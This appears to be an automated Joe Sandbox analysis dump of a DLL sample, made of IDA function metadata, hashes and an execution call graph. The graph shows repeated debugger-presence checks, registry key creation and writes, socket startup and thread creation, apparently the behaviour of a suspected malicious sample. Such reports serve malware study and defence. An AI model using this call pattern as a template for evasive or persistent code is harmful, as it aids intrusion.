                                                                                                      • Opcode Fuzzy Hash: d867a386a48197b94e4ee3be71525d37cef8140cc72bf4d8b975eb60631bb92b
                                                                                                      • Instruction Fuzzy Hash: 5921C7F260C126A6D714DB94CD01FB763BAABC4B64F228424E90AF7304E732FD41C290
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6D401A5B
                                                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6D401AAA
                                                                                                        • Part of subcall function 6D405CCE: _Yarn.LIBCPMT ref: 6D405CED
                                                                                                        • Part of subcall function 6D405CCE: _Yarn.LIBCPMT ref: 6D405D11
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                      • String ID: bad locale name
                                                                                                      • API String ID: 1908188788-1405518554
                                                                                                      • Opcode ID: 5f9afb627996a9824fd603f1e96aaeef59a0d7bccfdda0da0e0ed7ca579e482f
                                                                                                      • Instruction ID: 90c3a69a6435ce7e53788354769839e1be783ae63dab9baa37c0b3d9513b5ba0
                                                                                                      • Opcode Fuzzy Hash: 5f9afb627996a9824fd603f1e96aaeef59a0d7bccfdda0da0e0ed7ca579e482f
                                                                                                      • Instruction Fuzzy Hash: E2115E71819B849FD320CF69C900B57BBF8EB19614F004A6EE899C7B41E775A904CBA5
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6D405C6A
                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6D405CC5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                      • String ID: Eh@m
                                                                                                      • API String ID: 593203224-137412459
                                                                                                      • Opcode ID: 0d856d6c3697a76bbc4cde39368bc0ebe9f20c8b904ed439d96ed5a38f2feb9b
                                                                                                      • Instruction ID: 626d3654e89c5a1212c9403d98d43c988f85c2b8c6face9a91dc473ba4937c42
                                                                                                      • Opcode Fuzzy Hash: 0d856d6c3697a76bbc4cde39368bc0ebe9f20c8b904ed439d96ed5a38f2feb9b
                                                                                                      • Instruction Fuzzy Hash: 5F014835A04605AFDF05DF15C885EADBB79EF85620F1100A9D9059B3A1EB71EE40CAA0
                                                                                                      APIs
                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,6D413E9F,?,?,00000004), ref: 6D414FE5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                                                      • String ID: Eh@m$InitializeCriticalSectionEx
                                                                                                      • API String ID: 2593887523-746424252
                                                                                                      • Opcode ID: 489cddd6b198868b01cb596e52161ace0044a30b8c71f9e00e18775cfa279210
                                                                                                      • Instruction ID: c7382630aa2e95117a2cbdaf1c3f49d3d269ce14ee3d75c4d09bc8bd550fcf4b
                                                                                                      • Opcode Fuzzy Hash: 489cddd6b198868b01cb596e52161ace0044a30b8c71f9e00e18775cfa279210
                                                                                                      • Instruction Fuzzy Hash: 23F0BE31A08108BBCF01AF64CC00EBE7F75EF09360B014268FD181A254DB328E20EEE0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Free
                                                                                                      • String ID: Eh@m$FlsFree
                                                                                                      • API String ID: 3978063606-1567611034
                                                                                                      • Opcode ID: 17103239fbd53ac01e1dae2cc0d49492988c0ae977e79f4e6036a6e023866a1a
                                                                                                      • Instruction ID: 494c7a3c5d325aa707edae23fc1e2a5dc47f5bbf4dd663b849f488ddf007b1fd
                                                                                                      • Opcode Fuzzy Hash: 17103239fbd53ac01e1dae2cc0d49492988c0ae977e79f4e6036a6e023866a1a
                                                                                                      • Instruction Fuzzy Hash: 18E0E571E092186BCB11AF148C02F3FBB60EF4A745B420169FE095B205DB718D00C6D6
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2671974312.000000006D401000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2671852129.000000006D400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672103910.000000006D421000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672229024.000000006D42F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2672305968.000000006D431000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6d400000_loaddll32.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Alloc
                                                                                                      • String ID: Eh@m$FlsAlloc
                                                                                                      • API String ID: 2773662609-3790005588
                                                                                                      • Opcode ID: 9da4ff05eabcb658b4efe6ef521654fe2f991f38e0a7e80e2bc3957273167965
                                                                                                      • Instruction ID: b27d52e1d61e1a1ba9eecebbf4ca5cf749945143d68bbc4b2c2f95d93288b88f
                                                                                                      • Opcode Fuzzy Hash: 9da4ff05eabcb658b4efe6ef521654fe2f991f38e0a7e80e2bc3957273167965
                                                                                                      • Instruction Fuzzy Hash: D5E0E530E09158778B01AB648D05F7E7BA4DF49665B410168FD0957244DB329E1186D6

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:10.2%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:3.6%
                                                                                                      Total number of Nodes:2000
                                                                                                      Total number of Limit Nodes:72
                                                                                                      execution_graph 49428 e8daba 49429 e8dac6 __FrameHandler3::FrameUnwindToState 49428->49429 49458 e8d7e0 49429->49458 49431 e8dacd 49432 e8dc26 49431->49432 49435 e8daf7 49431->49435 49487 e8e4e1 4 API calls 2 library calls 49432->49487 49434 e8dc2d 49488 ea0be0 39 API calls __FrameHandler3::FrameUnwindToState 49434->49488 49446 e8db36 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 49435->49446 49469 ea17c5 49435->49469 49437 e8dc33 49489 ea0b92 49437->49489 49442 e8db16 49444 e8db97 49479 ea11aa 64 API calls 49444->49479 49446->49444 49483 e9c624 45 API calls 3 library calls 49446->49483 49448 e8db9d 49480 e41840 49448->49480 49459 e8d7e9 49458->49459 49492 e8de15 IsProcessorFeaturePresent 49459->49492 49461 e8d7f5 49493 e90dbd 10 API calls 2 library calls 49461->49493 49463 e8d7fa 49464 e8d7fe 49463->49464 49494 ea168d 49463->49494 49464->49431 49467 e8d815 49467->49431 49472 ea17dc 49469->49472 49470 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 49471 e8db10 49470->49471 49471->49442 49473 ea1769 49471->49473 49472->49470 49474 ea1798 49473->49474 49475 ea17b4 49473->49475 49474->49475 49517 e31000 49474->49517 49476 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 49475->49476 49477 ea17c1 49476->49477 49477->49446 49479->49448 49535 e40f50 49480->49535 49483->49444 49487->49434 49488->49437 51960 ea0a0f 49489->51960 49492->49461 49493->49463 49498 eaba76 49494->49498 49497 e90ddc 7 API calls 2 library calls 49497->49464 49501 eaba8f 49498->49501 49502 eaba93 49498->49502 49500 e8d807 49500->49467 49500->49497 49509 e8d512 49501->49509 49502->49501 49504 ea3f52 49502->49504 49505 ea3f59 49504->49505 49506 ea3f9c GetStdHandle 49505->49506 49507 ea4002 49505->49507 49508 ea3faf GetFileType 49505->49508 49506->49505 49507->49502 49508->49505 49510 e8d51a 49509->49510 49511 e8d51b IsProcessorFeaturePresent 49509->49511 49510->49500 49513 e8e321 49511->49513 49516 e8e2e4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 49513->49516 49515 e8e404 49515->49500 49516->49515 49524 e8d9a6 49517->49524 49520 e3103a WSAStartup 49521 e3104d 49520->49521 49522 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 49521->49522 49523 e3105b 49522->49523 49523->49474 49527 e8d979 49524->49527 49528 e8d988 49527->49528 49529 e8d98f 49527->49529 49533 ea14ca 29 API calls 49528->49533 49534 ea154c 29 API calls 49529->49534 49532 e31024 49532->49520 49532->49521 49533->49532 49534->49532 49536 e40f83 IsDebuggerPresent 49535->49536 49536->49536 49537 e40f89 49536->49537 49592 e40e40 49537->49592 49540 e40f90 IsDebuggerPresent 49540->49540 49541 e40f96 GetModuleFileNameW RegOpenKeyExW Sleep 49540->49541 49542 e40fe0 RegQueryValueExW 49541->49542 49543 e40fff RegCreateKeyW RegSetValueExW 49541->49543 49542->49543 49544 e41037 RegCloseKey 49542->49544 49543->49544 49615 e9ccd1 49544->49615 49554 e414c0 50027 e8c01b 78 API calls Concurrency::cancel_current_task 49554->50027 49555 e41163 49556 e41175 49555->49556 49557 e414d1 49555->49557 49649 e8bb4c CloseHandle 49556->49649 50028 e8c01b 78 API calls Concurrency::cancel_current_task 49557->50028 49559 e410cf 49635 e98ef7 49559->49635 49562 e4117c 49563 e414d8 49562->49563 49564 e41187 RegOpenKeyExW 49562->49564 50029 e8bfee 49563->50029 49568 e41397 RegCloseKey 49564->49568 49569 e41369 RegQueryValueExW 49564->49569 49650 e37c40 49568->49650 49569->49568 49570 e41389 RegCloseKey 49569->49570 49572 e413ae 49570->49572 49705 e3a1d0 49572->49705 49575 e413e0 IsDebuggerPresent 49575->49575 49576 e413e6 49575->49576 49802 e3fa10 49576->49802 50048 e33020 49592->50048 49594 e40e55 49595 e33020 2 API calls 49594->49595 49601 e40e69 49595->49601 49596 e40ec0 49597 e33020 2 API calls 49596->49597 49598 e40ed3 49597->49598 50053 e4a270 49598->50053 49599 e33020 2 API calls 49599->49601 49601->49596 49601->49599 49606 e40ef1 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 49607 e4a270 78 API calls 49606->49607 49608 e40f23 49607->49608 49609 e457c0 109 API calls 49608->49609 49610 e40f2a 49609->49610 49611 e4a270 78 API calls 49610->49611 49612 e40f36 49611->49612 49613 e4aa90 109 API calls 49612->49613 49614 e40f3c 49613->49614 49614->49540 50253 e9cc4d 49615->50253 49617 e4104a 49618 e98795 49617->49618 50264 ea43ff GetLastError 49618->50264 49620 e41050 49621 e98774 49620->49621 49622 ea43ff __Getctype 45 API calls 49621->49622 49623 e41058 49622->49623 49624 e8d73a 49623->49624 49627 e8d73f 49624->49627 49626 e8d759 49626->49559 49627->49626 49630 e317d0 Concurrency::cancel_current_task 49627->49630 50316 e9d9e8 49627->50316 50324 e9fba8 7 API calls 2 library calls 49627->50324 49629 e8d765 49629->49629 49630->49629 49631 e8f18a Concurrency::cancel_current_task RaiseException 49630->49631 49632 e317ec 49631->49632 50323 e8ee1e 27 API calls 2 library calls 49632->50323 49634 e31813 49634->49559 49636 e98f18 49635->49636 49637 e98f04 49635->49637 50327 e98ea5 49636->50327 50336 e9ca3d 20 API calls _free 49637->50336 49640 e98f09 50337 e9c3ae 26 API calls __cftof 49640->50337 49643 e98f2d CreateThread 49645 e98f58 49643->49645 49646 e98f4c GetLastError 49643->49646 50347 e98d99 49643->50347 49644 e41152 49644->49554 49644->49555 50339 e98e17 49645->50339 50338 e9ca07 20 API calls 2 library calls 49646->50338 49649->49562 50427 e38a00 49650->50427 51362 e8e880 49705->51362 49708 e48780 _MREFOpen@16 28 API calls 49709 e3a258 49708->49709 51364 e8c795 49709->51364 49711 e3a264 51370 e4abe0 49711->51370 49713 e3aa6a 49714 e3aa90 error_info_injector 49713->49714 49718 e3aac0 49713->49718 49715 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 49714->49715 49716 e3aab2 49715->49716 49716->49575 49717 e3a298 __cftof 49717->49713 51374 e43050 49717->51374 51398 e9c3be 26 API calls 2 library calls 49718->51398 49723 e48780 _MREFOpen@16 28 API calls 49724 e3a31a 49723->49724 49725 e48780 _MREFOpen@16 28 API calls 49724->49725 49726 e3a369 49725->49726 49727 e48780 _MREFOpen@16 28 API calls 49726->49727 49728 e3a3b3 49727->49728 49729 e48780 _MREFOpen@16 28 API calls 49728->49729 49730 e3a3fd 49729->49730 49731 e48780 _MREFOpen@16 28 API calls 49730->49731 49732 e3a447 49731->49732 49733 e48780 _MREFOpen@16 28 API calls 49732->49733 49734 e3a491 49733->49734 49735 e48780 _MREFOpen@16 28 API calls 49734->49735 49736 e3a4d9 49735->49736 49737 e48780 _MREFOpen@16 28 API calls 49736->49737 49738 e3a526 49737->49738 49739 e4a270 78 API calls 49738->49739 49740 e3a53a 49739->49740 51379 e4cfb0 49740->51379 49743 e4a270 78 API calls 49744 e3a567 49743->49744 49745 e4cfb0 78 API calls 49744->49745 49746 e3a588 49745->49746 49747 e4a270 78 API calls 49746->49747 49803 e3fa4c __cftof 49802->49803 51469 e3f020 49803->51469 50030 e8bff9 50029->50030 50031 e8c00c 50030->50031 50032 e9f226 50030->50032 51945 e8c01b 78 API calls Concurrency::cancel_current_task 50031->51945 51935 e9d38d 50032->51935 50036 e9f236 50038 e9f240 IsProcessorFeaturePresent 50036->50038 50042 e9f25f 50036->50042 50040 e9f24c 50038->50040 50039 ea0b92 __FrameHandler3::FrameUnwindToState 39 API calls 50044 e9f269 50039->50044 51947 e9c1e9 8 API calls 3 library calls 50040->51947 50042->50039 50045 e9f29e 50044->50045 50047 e414de 50044->50047 51938 ea4ddf 50044->51938 51948 e9f2c2 DeleteCriticalSection 50045->51948 50081 e8bdfc QueryPerformanceFrequency 50048->50081 50050 e33033 50082 e8bde5 QueryPerformanceCounter 50050->50082 50052 e3303f __alldvrm UnDecorator::getSymbolName __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 50052->49594 50054 e4a2b1 50053->50054 50058 e4a322 50054->50058 50094 e49d90 50054->50094 50059 e4a359 50058->50059 50104 e480a0 50058->50104 50083 e322e0 50059->50083 50060 e4a4d2 50061 e40ee4 50060->50061 50108 e49e50 78 API calls 50060->50108 50063 e457c0 50061->50063 50064 e45805 50063->50064 50065 e49d90 78 API calls 50064->50065 50067 e45820 50064->50067 50065->50067 50066 e322e0 78 API calls 50071 e45939 50066->50071 50069 e45876 50067->50069 50200 e4b3e0 79 API calls 4 library calls 50067->50200 50069->50066 50070 e40eeb 50073 e4aa90 50070->50073 50071->50070 50201 e49e50 78 API calls 50071->50201 50074 e4aacd 50073->50074 50202 e4a080 50074->50202 50079 e49d90 78 API calls 50080 e4ab1e 50079->50080 50080->49606 50081->50050 50082->50052 50084 e32302 50083->50084 50085 e322fa 50083->50085 50084->50060 50087 e32312 50085->50087 50109 e8f18a 50085->50109 50112 e32200 78 API calls 4 library calls 50087->50112 50089 e32348 50090 e8f18a Concurrency::cancel_current_task RaiseException 50089->50090 50091 e32357 50090->50091 50113 e8ee1e 27 API calls 2 library calls 50091->50113 50093 e32384 50093->50060 50095 e49e19 50094->50095 50096 e49dc9 50094->50096 50097 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 50095->50097 50114 e476f0 78 API calls 50096->50114 50099 e49e4b 50097->50099 50099->50058 50100 e49dd2 50101 e49e01 50100->50101 50102 e322e0 78 API calls 50100->50102 50101->50095 50115 e49e50 78 API calls 50101->50115 50102->50101 50116 e45270 50104->50116 50120 e42530 50104->50120 50105 e480b6 50105->50059 50108->50061 50110 e8f1d1 RaiseException 50109->50110 50111 e8f1a4 50109->50111 50110->50087 50111->50110 50112->50089 50113->50093 50114->50100 50115->50095 50117 e4532c 50116->50117 50118 e4529a _Yarn 50116->50118 50117->50105 50118->50117 50125 e44f60 50118->50125 50122 e4254a _Yarn 50120->50122 50124 e42616 _Yarn 50120->50124 50121 e426b0 50121->50105 50122->50105 50124->50121 50145 e9c95f 50124->50145 50126 e44f75 50125->50126 50127 e4510f 50125->50127 50128 e44f7b 50126->50128 50129 e44fd3 50126->50129 50130 e44fe8 50126->50130 50127->50118 50128->50118 50131 e8d73a std::_Facet_Register 28 API calls 50129->50131 50132 e4500f 50130->50132 50133 e44fff 50130->50133 50134 e4500d 50130->50134 50140 e44fe1 _Yarn 50131->50140 50136 e8d73a std::_Facet_Register 28 API calls 50132->50136 50132->50140 50133->50134 50135 e4511b 50133->50135 50134->50127 50137 e8d73a std::_Facet_Register 28 API calls 50134->50137 50143 e317d0 28 API calls 2 library calls 50135->50143 50136->50140 50137->50140 50142 e450dd error_info_injector 50140->50142 50144 e9c3be 26 API calls 2 library calls 50140->50144 50142->50118 50143->50140 50146 e9c98a 50145->50146 50147 e9c96d 50145->50147 50146->50121 50147->50146 50148 e9c97a 50147->50148 50149 e9c990 50147->50149 50162 e9ca3d 20 API calls _free 50148->50162 50154 e9c74e 50149->50154 50152 e9c97f 50163 e9c3ae 26 API calls __cftof 50152->50163 50155 e9c75a __FrameHandler3::FrameUnwindToState 50154->50155 50164 e98911 EnterCriticalSection 50155->50164 50157 e9c768 50165 e9c79f 50157->50165 50161 e9c786 __wsopen_s 50161->50146 50162->50152 50163->50146 50164->50157 50175 ea6db5 50165->50175 50172 e9c793 50199 e98925 LeaveCriticalSection 50172->50199 50174 e9c79d 50174->50161 50176 ea3c8d __fread_nolock 26 API calls 50175->50176 50177 ea6dc4 50176->50177 50178 eae7a2 __fread_nolock 26 API calls 50177->50178 50179 ea6dca _MREFOpen@16 50178->50179 50180 e9c7b3 50179->50180 50181 ea6049 __fread_nolock 21 API calls 50179->50181 50184 e9c7e4 50180->50184 50182 ea6e29 50181->50182 50183 ea4646 _free 20 API calls 50182->50183 50183->50180 50185 e9c7ce 50184->50185 50188 e9c7f6 50184->50188 50195 ea6e6a 50185->50195 50186 e9c804 50187 e9ca3d _free 20 API calls 50186->50187 50189 e9c809 50187->50189 50188->50185 50188->50186 50192 e9c82e _Yarn _MREFOpen@16 50188->50192 50190 e9c3ae __cftof 26 API calls 50189->50190 50190->50185 50191 e98b56 ___scrt_uninitialize_crt 71 API calls 50191->50192 50192->50185 50192->50191 50193 ea3c8d __fread_nolock 26 API calls 50192->50193 50194 ea58de __wsopen_s 71 API calls 50192->50194 50193->50192 50194->50192 50196 e9c775 50195->50196 50197 ea6e75 50195->50197 50196->50172 50197->50196 50198 e98b56 ___scrt_uninitialize_crt 71 API calls 50197->50198 50198->50196 50199->50174 50200->50069 50201->50070 50231 e8bf0d 50202->50231 50205 e8bf0d std::_Lockit::_Lockit 7 API calls 50206 e4a0f0 50205->50206 50209 e8bf65 std::_Lockit::~_Lockit 2 API calls 50206->50209 50207 e4a110 50211 e4a155 50207->50211 50213 e8d73a std::_Facet_Register 28 API calls 50207->50213 50209->50207 50210 e4a1dd 50212 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 50210->50212 50237 e8bf65 50211->50237 50214 e4a1f6 50212->50214 50215 e4a160 50213->50215 50223 e45610 50214->50223 50244 e31e80 78 API calls 2 library calls 50215->50244 50217 e4a190 50245 e8cae3 46 API calls __Getctype 50217->50245 50219 e4a1a6 50246 e31f30 76 API calls 3 library calls 50219->50246 50221 e4a1b8 50247 e8c33d 28 API calls std::_Facet_Register 50221->50247 50224 e45657 50223->50224 50225 e45672 50224->50225 50226 e49d90 78 API calls 50224->50226 50227 e322e0 78 API calls 50225->50227 50226->50225 50229 e4576e 50227->50229 50228 e45785 50228->50079 50229->50228 50252 e49e50 78 API calls 50229->50252 50232 e8bf1c 50231->50232 50233 e8bf23 50231->50233 50248 e9f30a 6 API calls std::_Lockit::_Lockit 50232->50248 50235 e4a0ce 50233->50235 50249 e8d1b3 EnterCriticalSection 50233->50249 50235->50205 50235->50207 50238 e9f318 50237->50238 50240 e8bf6f 50237->50240 50251 e9f2f3 LeaveCriticalSection 50238->50251 50243 e8bf82 50240->50243 50250 e8d1c1 LeaveCriticalSection 50240->50250 50242 e9f31f 50242->50210 50243->50210 50244->50217 50245->50219 50246->50221 50247->50211 50248->50235 50249->50235 50250->50243 50251->50242 50252->50228 50254 e9cc5c 50253->50254 50256 e9cc70 50253->50256 50261 e9ca3d 20 API calls _free 50254->50261 50260 e9cc6c __alldvrm 50256->50260 50263 ea4d36 11 API calls 2 library calls 50256->50263 50257 e9cc61 50262 e9c3ae 26 API calls __cftof 50257->50262 50260->49617 50261->50257 50262->50260 50263->50260 50265 ea4415 50264->50265 50268 ea441b 50264->50268 50291 ea4c31 11 API calls 2 library calls 50265->50291 50270 ea4421 50268->50270 50292 ea4c87 11 API calls 2 library calls 50268->50292 50269 ea4435 50271 ea44a6 SetLastError 50269->50271 50293 ea4088 50269->50293 50270->50271 50273 ea4426 50270->50273 50277 ea449a SetLastError 50270->50277 50312 e9f226 45 API calls __FrameHandler3::FrameUnwindToState 50271->50312 50273->50271 50275 ea44b2 50277->49620 50278 ea444d 50302 ea4c87 11 API calls 2 library calls 50278->50302 50279 ea4462 50309 ea4c87 11 API calls 2 library calls 50279->50309 50282 ea446e 50284 ea4472 50282->50284 50285 ea4481 50282->50285 50283 ea4459 50303 ea4646 50283->50303 50310 ea4c87 11 API calls 2 library calls 50284->50310 50311 ea4229 20 API calls __Getctype 50285->50311 50289 ea448c 50290 ea4646 _free 20 API calls 50289->50290 50290->50270 50291->50268 50292->50269 50294 ea4095 50293->50294 50295 ea40d5 50294->50295 50296 ea40c0 HeapAlloc 50294->50296 50300 ea40a9 __Getctype 50294->50300 50314 e9ca3d 20 API calls _free 50295->50314 50297 ea40d3 50296->50297 50296->50300 50299 ea40da 50297->50299 50299->50278 50299->50279 50300->50295 50300->50296 50313 e9fba8 7 API calls 2 library calls 50300->50313 50302->50283 50304 ea4651 RtlFreeHeap 50303->50304 50308 ea467a _free 50303->50308 50305 ea4666 50304->50305 50304->50308 50315 e9ca3d 20 API calls _free 50305->50315 50307 ea466c GetLastError 50307->50308 50308->50273 50309->50282 50310->50283 50311->50289 50312->50275 50313->50300 50314->50299 50315->50307 50321 ea6049 __Getctype 50316->50321 50317 ea6087 50326 e9ca3d 20 API calls _free 50317->50326 50319 ea6072 RtlAllocateHeap 50320 ea6085 50319->50320 50319->50321 50320->49627 50321->50317 50321->50319 50325 e9fba8 7 API calls 2 library calls 50321->50325 50323->49634 50324->49627 50325->50321 50326->50320 50328 ea4088 __Getctype 20 API calls 50327->50328 50329 e98eb6 50328->50329 50330 ea4646 _free 20 API calls 50329->50330 50331 e98ec3 50330->50331 50332 e98eca GetModuleHandleExW 50331->50332 50333 e98ee7 50331->50333 50332->50333 50334 e98e17 22 API calls 50333->50334 50335 e98eef 50334->50335 50335->49643 50335->49645 50336->49640 50337->49644 50338->49645 50340 e98e47 50339->50340 50341 e98e23 50339->50341 50340->49644 50342 e98e29 CloseHandle 50341->50342 50343 e98e32 50341->50343 50342->50343 50344 e98e38 FreeLibrary 50343->50344 50345 e98e41 50343->50345 50344->50345 50346 ea4646 _free 20 API calls 50345->50346 50346->50340 50348 e98da5 _unexpected 50347->50348 50349 e98db9 50348->50349 50350 e98dac GetLastError ExitThread 50348->50350 50351 ea43ff __Getctype 45 API calls 50349->50351 50352 e98dbe 50351->50352 50363 ea5fd1 50352->50363 50355 e98dd5 50357 e98df1 50355->50357 50368 e337c0 CreateEventW 50355->50368 50400 e98f7c 23 API calls 50357->50400 50364 ea5fe2 GetPEB 50363->50364 50367 e98dc9 50363->50367 50365 ea5ff5 50364->50365 50364->50367 50401 ea4a16 50365->50401 50367->50355 50399 ea4fa2 10 API calls 2 library calls 50367->50399 50369 e337f2 GetLastError 50368->50369 50370 e33828 CreateEventW 50368->50370 50374 e33802 50369->50374 50371 e33842 GetLastError 50370->50371 50372 e33879 50370->50372 50378 e33852 50371->50378 50373 e98ef7 190 API calls 50372->50373 50375 e33898 50373->50375 50376 e33916 50374->50376 50377 e33825 50374->50377 50379 e338f3 50375->50379 50380 e338a8 GetLastError 50375->50380 50382 e33480 78 API calls 50376->50382 50377->50370 50378->50372 50381 e33923 50378->50381 50384 e33903 50379->50384 50385 e338f7 WaitForSingleObject CloseHandle 50379->50385 50387 e338b9 50380->50387 50383 e33480 78 API calls 50381->50383 50382->50381 50386 e33930 50383->50386 50388 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 50384->50388 50385->50384 50419 e33480 50386->50419 50390 e338c0 50387->50390 50391 e338bd CloseHandle 50387->50391 50392 e33910 50388->50392 50394 e338ca CloseHandle 50390->50394 50395 e338cd 50390->50395 50391->50390 50392->50357 50394->50395 50395->50379 50395->50386 50399->50355 50406 ea493d 50401->50406 50403 ea4a3d 50404 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 50403->50404 50405 ea4a67 50404->50405 50405->50367 50407 ea496a 50406->50407 50411 ea4966 __FrameHandler3::FrameUnwindToState 50406->50411 50407->50411 50412 ea4875 50407->50412 50410 ea4984 GetProcAddress 50410->50411 50411->50403 50417 ea4886 ___vcrt_InitializeCriticalSectionEx 50412->50417 50413 ea48a3 LoadLibraryExW 50415 ea48be GetLastError 50413->50415 50413->50417 50414 ea4930 50414->50410 50414->50411 50415->50417 50416 ea4919 FreeLibrary 50416->50417 50417->50413 50417->50414 50417->50416 50418 ea48f1 LoadLibraryExW 50417->50418 50418->50417 50420 e334b7 50419->50420 50425 e331f0 27 API calls 2 library calls 50420->50425 50422 e334d3 50426 e4a200 78 API calls Concurrency::cancel_current_task 50422->50426 50425->50422 50428 e38a65 __cftof 50427->50428 50429 e51c70 78 API calls 50428->50429 50430 e38a75 50429->50430 50718 e38e00 50430->50718 50719 e38e73 __cftof 50718->50719 50799 e7e880 50719->50799 50721 e38e81 50808 e785f0 50721->50808 50723 e38ea1 __cftof 50724 e7e880 80 API calls 50723->50724 50725 e38ec9 50724->50725 50726 e785f0 112 API calls 50725->50726 50727 e38ee6 __cftof 50726->50727 50831 e7c100 50727->50831 50729 e38f14 __cftof 50730 e7c100 80 API calls 50729->50730 50731 e38f42 50730->50731 50839 e7af50 50731->50839 50734 e7af50 _MREFOpen@16 24 API calls 50735 e38f8a __cftof 50734->50735 50736 e48780 _MREFOpen@16 28 API calls 50735->50736 50737 e38ff4 50736->50737 50738 e48780 _MREFOpen@16 28 API calls 50737->50738 50739 e39020 50738->50739 50740 e37670 80 API calls 50739->50740 50744 e3903d error_info_injector 50740->50744 50741 e390bb error_info_injector 50742 e8d73a std::_Facet_Register 28 API calls 50741->50742 50745 e390e7 